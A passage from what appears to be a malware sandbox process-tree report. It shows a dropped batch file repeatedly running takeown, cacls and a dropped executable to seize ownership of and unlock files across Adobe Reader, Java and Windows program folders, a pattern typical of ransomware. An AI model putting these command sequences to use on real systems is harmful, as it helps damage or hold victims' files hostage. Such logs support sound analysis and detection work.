  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "AdobeID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1920
    - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV64.exe
        
        Q0OgcQKV.exe -accepteula "AdobeID.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:828
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:956
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1748
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
  2⤵
  - Loads dropped DLL
  PID:972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
    3⤵
    PID:324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
    3⤵
    PID:1404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "DefaultID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1484
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "DefaultID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:472
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:776
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
  2⤵
  - Loads dropped DLL
  PID:2008
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "SignHere.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1948
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "SignHere.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1900
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""
  2⤵
  - Loads dropped DLL
  PID:1436
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C
    3⤵
    PID:772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "Dynamic.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1748
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "Dynamic.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:956
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
  2⤵
  - Loads dropped DLL
  PID:992
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
    3⤵
    PID:1404
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "ENUtxt.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1096
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "ENUtxt.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:592
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1736
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:1856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1924
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:1216
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
  2⤵
  - Loads dropped DLL
  PID:2028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    - Modifies file permissions
    PID:316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "StandardBusiness.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1620
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "StandardBusiness.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1128
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1628
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:920
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1564
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:924
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  - Loads dropped DLL
  PID:1960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1884
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:300
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1844
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\en-US\Journal.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:1668
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1404
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\Journal.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1076
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:972
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\Templates\Genko_1.jtp""
  2⤵
  - Loads dropped DLL
  PID:1452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" /E /G Admin:F /C
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Genko_1.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "Genko_1.jtp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1444
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "Genko_1.jtp" -nobanner
      4⤵
      Executes dropped EXE
      PID:1004
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:1744
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:560
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:776
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\PDIALOG.exe""
  2⤵
  - Loads dropped DLL
  PID:568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\PDIALOG.exe" /E /G Admin:F /C
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\PDIALOG.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "PDIALOG.exe" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2036
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "PDIALOG.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:1884
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1460
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp""
  2⤵
  - Loads dropped DLL
  PID:1736
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" /E /G Admin:F /C
    3⤵
    PID:772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "To_Do_List.jtp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1596
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "To_Do_List.jtp" -nobanner
      4⤵
      Executes dropped EXE
      PID:1004
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\Templates\Music.jtp""
  2⤵
  - Loads dropped DLL
  PID:1888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Music.jtp" /E /G Admin:F /C
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Music.jtp"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "Music.jtp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:992
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "Music.jtp" -nobanner
      4⤵
      Executes dropped EXE
      PID:924
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1644
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Mail\WinMail.exe""
  2⤵
  - Loads dropped DLL
  PID:1044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C
    3⤵
    PID:920
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\WinMail.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "WinMail.exe" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1160
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "WinMail.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:1884
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1096
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:1668
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1444
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1004
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""
  2⤵
  - Loads dropped DLL
  PID:1960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"
    3⤵
    - Modifies file permissions
    PID:1584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "AGMGPUOptIn.ini" -nobanner
    3⤵
    - Loads dropped DLL
    PID:776
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "AGMGPUOptIn.ini" -nobanner
      4⤵
      Executes dropped EXE
      PID:924
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""
  2⤵
  - Loads dropped DLL
  PID:1608
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "LogTransport2.exe" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2036
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "LogTransport2.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:1844
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:1044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1596
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1492
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp""
  2⤵
  - Loads dropped DLL
  PID:1668
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\blank.jtp" /E /G Admin:F /C
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\blank.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "blank.jtp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:992
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "blank.jtp" -nobanner
      4⤵
      Executes dropped EXE
      PID:924
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp""
  2⤵
  - Loads dropped DLL
  PID:1960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Seyes.jtp" /E /G Admin:F /C
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Seyes.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "Seyes.jtp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1884
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "Seyes.jtp" -nobanner
      4⤵
      Executes dropped EXE
      PID:2036
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:1856
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:616
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:112
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1596
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""
  2⤵
  - Loads dropped DLL
  PID:1044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"
    3⤵
    PID:964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "AcroSign.prc" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1620
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "AcroSign.prc" -nobanner
      4⤵
      Executes dropped EXE
      PID:956
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1568
- C:\Windows\SysWOW64\cmd.exe
